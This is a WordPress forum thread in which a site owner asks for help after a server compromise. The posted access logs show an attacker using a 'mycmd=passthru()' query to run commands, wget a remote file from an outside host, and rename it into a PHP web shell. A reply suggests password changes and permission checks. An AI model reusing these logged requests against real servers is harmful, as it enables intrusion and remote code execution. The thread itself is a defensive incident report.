WordPress.org

Ready to get started?Download WordPress

Forums

New Exploit? (2 posts)

  1. clar2242
    Member
    Posted 6 years ago #

    Hey, just wondering if anybody has experienced this before...

    Last night I was alerted that my server was down, got it rebooted and tried to figure out what happened.

    Looks like somehow somebody got r57 shell uploaded to my server.

    Looking through my access logs:

    80.218.10.244 - - [14/Feb/2008:20:54:25 +0000] "GET /?mycmd=passthru("id"); HTTP/1.0" 200 19911 "-" "Snoopy v1.2.3"
    80.218.10.244 - - [14/Feb/2008:20:54:28 +0000] "GET /?mycmd=passthru("uname+-a"); HTTP/1.0" 200 19958 "-" "Snoopy v1.2.3"
    80.218.10.244 - - [14/Feb/2008:20:54:33 +0000] "GET /?mycmd=passthru("w"); HTTP/1.0" 200 20145 "-" "Snoopy v1.2.3"
    80.218.10.244 - - [14/Feb/2008:20:54:42 +0000] "GET /?mycmd=passthru("pwd"); HTTP/1.0" 200 19896 "-" "Snoopy v1.2.3"
    80.218.10.244 - - [14/Feb/2008:20:54:46 +0000] "GET /?mycmd=passthru("ls+-lah"); HTTP/1.0" 200 22356 "-" "Snoopy v1.2.3"
    80.218.10.244 - - [14/Feb/2008:20:54:58 +0000] "GET /?mycmd=passthru("wget+coded.altervista.org%2Fcmd.txt"); HTTP/1.0" 200 19857 "-" "Snoopy v1.2.3"
    80.218.10.244 - - [14/Feb/2008:20:55:11 +0000] "GET /cmd.txt HTTP/1.1" 200 98799 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.11) Gecko/20071229 Firefox/2.0.0.11"
    80.218.10.244 - - [14/Feb/2008:20:55:21 +0000] "GET /?mycmd=passthru("mv+cmd.txt+cmd.php"); HTTP/1.0" 200 19857 "-" "Snoopy v1.2.3"
    80.218.10.244 - - [14/Feb/2008:20:55:26 +0000] "GET /cmd.php HTTP/1.1" 200 36414 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.11) Gecko/20071229 Firefox/2.0.0.11"
    80.218.10.244 - - [14/Feb/2008:20:56:20 +0000] "POST /cmd.php HTTP/1.1" 200 33523 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.11) Gecko/20071229 Firefox/2.0.0.11"

    Any ideas what where the mycmd stuff is done? I can't find it by doing a recursive grep.

    And I can't recreate this doing it myself. Any ideas??

    I've updated to 2.3.3 this morning

  2. Kafkaesqui

    Posted 6 years ago #

    There is no 'mycmd' GET query var in WordPress. Apparently a blind attempt to test for exploits (not hard to guess what ?mycmd= is meant for, though -- anyone know of a WP plugin using it?). But I would do the standard of password changes, check of permissions on files/directories, etc.

    [Moderator note: moving to Misc. forum]

Topic Closed

This topic has been closed to new replies.

About this Topic

Tags

No tags yet.